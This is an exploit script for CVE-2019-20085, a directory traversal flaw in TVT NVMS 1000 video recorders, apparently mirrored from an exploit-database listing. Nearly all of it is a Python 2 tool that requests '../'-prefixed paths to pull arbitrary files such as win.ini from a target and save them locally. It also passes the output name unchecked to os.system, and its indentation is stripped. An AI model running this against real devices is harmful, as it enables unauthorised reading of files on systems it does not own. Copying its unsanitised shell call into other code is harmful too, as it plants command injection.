Share
## https://sploitus.com/exploit?id=PACKETSTORM:157196
# Exploit Title: TVT NVMS 1000 - Directory Traversal   
# Date: 2020-04-13  
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)  
# Vendor Homepage: http://en.tvt.net.cn/  
# Version : N/A  
# Software Link : http://en.tvt.net.cn/products/188.html  
# Original Author : Numan Türle  
# CVE : CVE-2019-20085  
  
import sys  
import requests  
import os  
import time  
  
if len(sys.argv) !=4:  
print " "  
print "Usage : python exploit.py url filename outputname"  
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"   
print " "  
else:  
  
  
traversal = "../../../../../../../../../../../../../"  
filename = sys.argv[2]  
url = sys.argv[1]+traversal+filename  
outputname = sys.argv[3]  
content = requests.get(url)  
  
if content.status_code == 200:  
  
print " "  
print "Directory Traversal Succeeded"  
time.sleep(3)  
print " "  
print "Saving Output"  
os.system("touch " + outputname)  
output_write = open(outputname,"r+")  
output_write.write(content.text)  
output_write.close()  
  
else:  
  
print "Host not vulnerable to Directory Traversal!"